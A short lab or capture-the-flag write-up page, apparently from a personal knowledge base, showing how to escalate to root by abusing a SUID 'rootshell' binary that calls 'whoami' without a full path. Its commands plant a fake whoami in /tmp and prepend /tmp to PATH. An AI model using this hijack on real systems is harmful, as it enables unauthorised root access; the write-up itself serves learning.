Privilege Escalation

Suid file

Upon checking the/home/tom directory, I found an interesting file rootshell.c file and a compile file rootshell that owns SUID permissions.

According to the code, it will execute the whoami file and check if the current user is tom. If the current user is tom it will escalate the privilege into the highest privilege or else it will only print username-id of the current user.

Create a whoami file in /tmp directory and make it executable.

echo "printf "tom"" > whoami  
chmod +x whoami

Changing the target system path /tmp directory, and check if it is changed.

 
export PATH=/tmp:$PATH  
echo $PATH

Execute the rootshell

cd /home/tom  
./rootshell

Malleum Knowledge Base

Explorer

Privilege Escalation

Suid file

Create a whoami file in /tmp directory and make it executable.

Execute the rootshell

Graph View

Table of Contents